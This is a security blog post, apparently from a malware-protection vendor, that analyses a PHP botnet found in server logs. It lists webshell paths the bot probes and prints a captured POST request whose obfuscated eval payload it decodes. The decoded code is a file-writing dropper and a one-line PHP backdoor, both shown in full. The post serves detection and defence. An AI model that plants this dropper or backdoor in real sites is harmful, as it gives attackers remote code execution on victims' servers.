malware botnetwork

sql_dump.php – Bot network

by

Today we looked server’s logs and we found very active Bot network that trying use old malware and upload more PHP code files to servers.

malware botnetwork

Malware files

If we look access logs, we found many files which tried access, but they not are normal WordPress, Joomla etc. files.

/Abbrevsprl.php
/administrator/administrator.php
/administrator/dbconfig.php
/administrator/includes/readmy.php
/administrator/webconfig.txt.php
/al277.php
/authenticating.php
/bookmark.php
/cache/cache_aqbmkwwx.php
/cache/cachee.php
/cache/defau1t.php
/cache/list.php
/cache/news.php
/cache/support.php
/cli/40dd1d.php
/configbak.php
/configurationbak.php
/dswat.org/wsdl.php
/elements.php
/email.php
/error-log.php
/functions.php
/goog1es.php
/google-assist.php
/images/1ndex.php
/images/404.php
/images/al277.php
/images/defau1t.php
/images/google-assist.php
/images/head.php
/images/laj.php
/images/robots.txt.php
/images/stories/0day.php
/images/xxx.php
/includes.php
/includes/u2p.php
/infos.php
/install.php
/jconfig.php
/log.php
/maill.php
/media/1ndex.php
/media/404.php
/media/reads.php
/media/tmp.php
/news.php
/r3x.php
/robot.php
/robots.txt.php
/RoseLeif.php
/SessionController.php
/shootme.php
/show.php
/site/tmp/cTivrC.php
/sqlbak.php
/sql_dump.php
/thumb.php
/tmp.php
/update.php
/webconfig.txt.php
/wp-cache.php
/wp-content/plugins/Analyser.php
/wp-content/plugins/Fbrrchive.php
/wp-content/plugins/myshe.php
/wp-content/plugins/SocketIasrgasfontrol.php
/wp-content/plugins/SocketIontrol.php
/wp-content/plugins/sql_dump.php
/wp-content/plugins/wp-cache.php
/wp-content/plugins/wp-footers.php
/wp-content/plugins/wpfootes.php
/wp-content/uploads/Fbrrchive.php
/wp-data.php
/wp-main.php
/wsdl.php
/xmlsrpc.php

POST Payload

If malware found on the server, it’s trying to send Command and Execute it. It sends POST payload and same time GET request to PHP malware which are BASE64 encoded.

Header request

--c866566e-B--
POST /images/stories/0day.php?z3=QzYzanFzLnBocA%3d%3d&z4=L2ltYWdlcy9zdG9yaWVzLw%3d%3d HTTP/1.1
Referer: malware.expert
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: malware.expert
Content-Length: 1349
Expect: 100-continue

Payload

POST payload is also urlencoded and BASE64 encoded:

--c866566e-C--
cmd=%40eval%2f**%2f(%24%7b%27_P%27.%27OST%27%7d%5bz9%5d%2f**%2f(%24%7b%27_POS%27.%27T%27%7d%5bz0%5d))%3b&z9=BaSE64_dEcOdE&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApOyRucGF0aD0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLkJhU0U2NF9kRWNPZEUoJF9HRVRbJ3o0J10pO2Z1bmN0aW9uIGNyZWF0ZUZvbGRlcigkcGF0aCl7aWYoIWZpbGVfZXhpc3RzKCRwYXRoKSl7Y3JlYXRlRm9sZGVyKGRpcm5hbWUoJHBhdGgpKTtta2RpcigkcGF0aCwgMDc3Nyk7fX1jcmVhdGVGb2xkZXIoJG5wYXRoKTtlY2hvKCItPnwiKTs7JGM9JF9QT1NUWyJ6MiJdOyRmPSRucGF0aC5CYVNFNjRfZEVjT2RFKCRfR0VUWyJ6MyJdKTskYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTskYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTskYnVmPSIiO2ZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTIpJGJ1Zi49dXJsZGVjb2RlKCIlIi5zdWJzdHIoJGMsJGksMikpO2VjaG8oQGZ3cml0ZShmb3BlbigkZiwidyIpLCRidWYpPyIxIjoiMCIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3d&z2=EFBBBF3C3F70687020282473756E203D20245F504F53545B276E6E64275D292026262040707265675F7265706C61636528272F61642F65272C2740272E7374725F726F743133282772696E7927292E27282473756E29272C202761646427293B3F3E6C736C666A73646C666B6A73646A6C665344466C666A70376A64736673646C6A666C73646B666A6C6B6A6C6B6A6C736B6A61646C6A6468676C726B652121212121402324255E2524244024235E402531323433352523242523402423256A6B6466686768676965726E716E77765F2B26252426235E252A285156524A4C515745524C515757455224252526252640252324255E25265E262A2A262829282925402421232525

Decoding

If we collect all parameters GET/POST requests and decoding them:

cmd=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));
z3=C63jqs.php
z4=/images/stories/
z9=BaSE64_dEcOdE

z0 parameter

@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
$npath=$_SERVER['DOCUMENT_ROOT'].BaSE64_dEcOdE($_GET['z4']);
function createFolder($path) {
   if(!file_exists($path))
   {
   createFolder(dirname($path));
   mkdir($path, 0777);
   }
}
createFolder($npath);
echo(">|");;
$c=$_POST["z2"];
$f=$npath.BaSE64_dEcOdE($_GET["z3"]);
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));
echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;
echo("|<-");
die();

z2 parameter

EFBBBF3C3F70687020282473756E203D20245F504F53545B276E6E64275D292026262040707265675F7265706C61636528272F61642F65272C2740272E7374725F726F743133282772696E7927292E27282473756E29272C202761646427293B3F3E6C736C666A73646C666B6A73646A6C665344466C666A70376A64736673646C6A666C73646B666A6C6B6A6C6B6A6C736B6A61646C6A6468676C726B652121212121402324255E2524244024235E402531323433352523242523402423256A6B6466686768676965726E716E77765F2B26252426235E252A285156524A4C515745524C515757455224252526252640252324255E25265E262A2A262829282925402421232525

Decoding z2 parameter

($sun = $_POST['nnd']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($sun)', 'add');
lslfjsdlfkjsdjlfSDFlfjp7jdsfsdljflsdkfjlkjlkjlskjadljdhglrke!!!!!@#$%^%$$@$#^@%12435%#$%#@$#%jkdfhghgiernqnwv_+&%$&#^%*(QVRJLQWERLQWWER$%%&%&@%#$%^%&^&**&()()%@$!#%%|<-

Writing more malware

Now we see this malware trying write C63jqs.php Malware to server folder /images/stories/ which is Joomla directory.

Final words

Websites that using Malware Expert – ModSecurity rules are protected against this bot network attacks.

Use Malware Expert – Signatures detect this malware from files for FREE!